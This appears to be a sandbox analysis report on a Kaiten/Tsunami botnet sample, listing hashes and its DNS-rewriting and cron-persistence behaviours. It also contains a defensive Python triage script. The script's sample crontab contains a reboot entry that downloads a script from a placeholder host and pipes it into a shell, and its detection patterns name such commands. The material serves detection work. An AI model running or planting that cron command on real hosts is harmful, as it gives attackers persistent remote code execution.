General

  • Target

    69278e9f629f9b18ab8f80e18b422986_JaffaCakes118

  • Size

    573KB

  • Sample

    240730-addrwaxfnm

  • MD5

    69278e9f629f9b18ab8f80e18b422986

  • SHA1

    11217cac6023d4b0eddf7955b01ee22ee83d8fa8

  • SHA256

    8fb043c6e802a5d71bc908fe3a652f0076a7975310ce8772869b3980b1189c84

  • SHA512

    edd5cfa6bfd7a9d4a517955d941df3fc680897c2d0c1a89dc3d9c07a8329927bfd462cb28a072e01698dbdea14760874b3ba9c61f2733a47ced09610ee6d6e79

  • SSDEEP

    12288:xgzrhDDhR68i/YkE1a+ZdVI4GvTIy6Q3xxPlitj4QqufXtIJ:xgdhR69u1aYGvTIyDxxPUFTi

Targets

    • Target

      69278e9f629f9b18ab8f80e18b422986_JaffaCakes118


    • Detects Kaiten/Tsunami Payload

    • Kaiten/Tsunami

      A Linux IoT botnet family whose bots are controlled over IRC; it is normally used to carry out DDoS attacks.

    • Writes DNS configuration

      Writes to the DNS resolver configuration file (/etc/resolv.conf on Linux). Replacing the host's resolvers can redirect name lookups or keep attacker infrastructure resolvable, so the nameserver entries actually written are what to record and compare against the expected configuration.

    • Creates/modifies Cron job

      Cron runs tasks on a schedule; adding or editing a crontab entry is a common Linux persistence technique, so the scheduled command, its timing (for example @reboot or every minute) and the path it executes from are worth capturing.
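To make the two behavioural signatures above checkable on a suspect Linux host, here is an added example (it is not code from the sandbox report and not Kaiten/Tsunami's own code) that scans crontab text for persistence patterns and compares the nameservers in /etc/resolv.conf with the set an environment expects. The heuristics, the directory list, the regular expressions and the embedded sample crontab and resolv.conf are constructed assumptions for illustration, not indicators extracted from this sample.

```python
"""Host-side triage for the two Linux behaviours in the report:
cron-based persistence and rewriting of the DNS resolver config.

Added example, not code from the sandbox report or from the malware.
It runs on constructed sample text so it works offline; feed it the
real file contents on a suspect host to use it for triage."""
import re
from dataclasses import dataclass, field

# Heuristic list of directories legitimate cron jobs rarely run from
# (an assumption for illustration, not an indicator from this sample).
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/run/shm/")

# "wget ... | sh", "curl ... | bash" and similar inside a cron command.
DOWNLOAD_TO_SHELL = re.compile(r"\b(?:curl|wget|tftp)\b[^|;&]*\|\s*(?:ba|da)?sh\b")

# VAR=value lines that crontabs allow before the entries.
ENV_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


@dataclass
class CronFinding:
    source: str
    schedule: str
    command: str
    reasons: list = field(default_factory=list)


def split_cron_entry(line, system):
    """Return (schedule, command) for one crontab line, or None for blank,
    comment and VAR=value lines.  System crontabs (/etc/crontab, /etc/cron.d)
    carry a user field between schedule and command; per-user ones do not."""
    s = line.strip()
    if not s or s.startswith("#") or ENV_ASSIGNMENT.match(s):
        return None
    n_sched = 1 if s.startswith("@") else 5    # @reboot/@daily vs 5 time fields
    n_skip = n_sched + (1 if system else 0)
    parts = s.split(None, n_skip)              # keeps the command's own spacing
    if len(parts) <= n_skip:
        return None                            # malformed or truncated entry
    return " ".join(parts[:n_sched]), parts[n_skip]


def suspicious_reasons(schedule, command):
    """Persistence heuristics applied to a single cron entry."""
    reasons = []
    if schedule == "@reboot":
        reasons.append("runs at boot")
    elif schedule == "* * * * *":
        reasons.append("runs every minute")
    if any(d in command for d in SUSPICIOUS_DIRS):
        reasons.append("executes from a temp/world-writable directory")
    if DOWNLOAD_TO_SHELL.search(command):
        reasons.append("pipes a download into a shell")
    if re.search(r"base64\s+(-d|--decode)", command):
        reasons.append("decodes base64 inline")
    return reasons


def analyse_crontab(text, source, system):
    """Scan crontab text and return the entries that trip any heuristic."""
    findings = []
    for line in text.splitlines():
        entry = split_cron_entry(line, system)
        if entry is None:
            continue
        schedule, command = entry
        reasons = suspicious_reasons(schedule, command)
        if reasons:
            findings.append(CronFinding(source, schedule, command, reasons))
    return findings


def check_resolv_conf(text, expected_nameservers):
    """Return (nameservers found, nameservers outside the expected set)."""
    found = re.findall(r"^\s*nameserver\s+(\S+)", text, re.M)
    unexpected = [ns for ns in found if ns not in expected_nameservers]
    return found, unexpected


# Constructed sample data: a system crontab with two planted entries and a
# resolv.conf with an extra resolver.  198.51.100.0/24 is a documentation
# range and example.invalid a reserved name; neither comes from the sample.
SAMPLE_SYSTEM_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root /tmp/.x/update >/dev/null 2>&1
@reboot root sh -c 'wget -q -O- http://example.invalid/s.sh | sh'
"""

SAMPLE_RESOLV_CONF = """\
# Generated by NetworkManager
search corp.example
nameserver 10.0.0.53
nameserver 198.51.100.7
"""

EXPECTED_NAMESERVERS = {"10.0.0.53"}   # what config management is meant to push


if __name__ == "__main__":
    for f in analyse_crontab(SAMPLE_SYSTEM_CRONTAB, "/etc/crontab", system=True):
        print(f"{f.source}: [{f.schedule}] {f.command}\n    -> {', '.join(f.reasons)}")
    found, unexpected = check_resolv_conf(SAMPLE_RESOLV_CONF, EXPECTED_NAMESERVERS)
    print("resolv.conf nameservers:", found)
    if unexpected:
        print("unexpected resolvers (compare with the sandbox's file write):", unexpected)
```

On a real host, run `analyse_crontab` over /etc/crontab and every file under /etc/cron.d with `system=True`, and over the per-user spool files (for example /var/spool/cron/crontabs/*) with `system=False`; the heuristics are deliberately coarse, so treat hits as leads to confirm against the sandbox's recorded file writes rather than as verdicts.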
